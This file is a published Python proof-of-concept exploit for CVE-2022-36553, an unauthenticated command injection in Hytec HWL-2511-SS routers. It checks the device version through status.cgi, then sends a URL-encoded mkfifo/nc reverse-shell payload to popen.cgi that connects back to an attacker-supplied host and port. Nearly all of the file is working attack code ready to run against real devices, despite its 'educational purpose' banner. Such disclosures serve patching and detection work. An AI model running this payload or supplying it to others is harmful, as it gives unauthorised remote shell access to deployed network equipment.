# -*- coding: utf-8 -*- # Exploit Title: PoPwned command Injection # Date: 7/26/2022 # Exploit Author: Samy Younsi (https://samy.link) # Vendor Homepage: https://hytec.co.jp # Software Link: https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html # Version: 1.05 and under. # Tested on: HWL-2511-SS version 1.05 (Ubuntu) # CVE : CVE-2022-36553 from __future__ import print_function, unicode_literals import argparse import requests import json import urllib3 urllib3.disable_warnings() def banner(): hytecLogo = """ ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓▓▓ ▓▓▓▓▓▓ ▓▓ ▒▒ ▒▒▓▓ ▓▓▒▒ ▓▓ ▓▓ ▒▒ ▒▒▓▓░░░░ ▓▓ ▓▓ ▓▓▓▓▓▓ ▓▓▓▓▓▓ ▓▓ ▓▓ ░░ ▓▓ ▓▓ ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ ▓▓ ▒▒▓▓ ▓▓▓▓ ▓▓ ▓▓ ░░░░ ░░░░ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓░░░░▓▓ ▓▓ ▓▓ ▒▒▓▓ ▓▓ ▓▓ ▓▓ ▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓▓▓▓▓ ▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓ ▓▓░░░░░░░░░░░░▓▓░░░░░░░░▒▒░░░░░░░░▓▓░░░░░░░░░░░░░░░░░░░░▓▓ ▓▓░░░░░░░░░░▓▓░░▓▓░░░░▓▓░░▓▓░░░░▓▓░░▓▓░░░░░░░░░░░░░░░░░░▓▓ ▓▓░░░░░░░░░░░░▒▒░░░░░░░░▒▒░░░░░░░░▓▓░░░░░░░░░░░░░░░░░░░░▓▓ ▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░HWL-2511-SS░░░░▓▓ ▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mHWL-2511-SS PING PONG\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(hytecLogo)) def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}/cgi-bin/status.cgi?act=status'.format(RHOST, RPORT) response = requests.get(url, allow_redirects=False, verify=False, timeout=60) if response.status_code != 200: print('[!] \033[1;91mError: HWL-2511-SS device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() deviceInfo = json.loads(response.content) try: if deviceInfo['status']['system']['szSwMobileRouterVersion']: version = deviceInfo['status']['system']['szSwMobileRouterVersion'] if float(version) > 1.05: print('[INFO] HWL-2511-SS version {} detected, this device has been patched.'.format(deviceInfo['status']['system']['szSwMobileRouterVersion'])) exit() print('[INFO] HWL-2511-SS version: {}'.format(deviceInfo['status']['system']['szSwMobileRouterVersion'])) except: print('[ERROR] Can\'t grab the device version...') def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT) url = 'https://{}:{}/cgi-bin/popen.cgi?command={}'.format(RHOST, RPORT, payload) try: print('[INFO] Executing reverse shell...') response = requests.get(url, allow_redirects=False, verify=False) print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the HWL-2511-SS device can reach the host {}:{}").format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Hytec Inter HWL-2511-SS devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (HWL-2511-SS device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()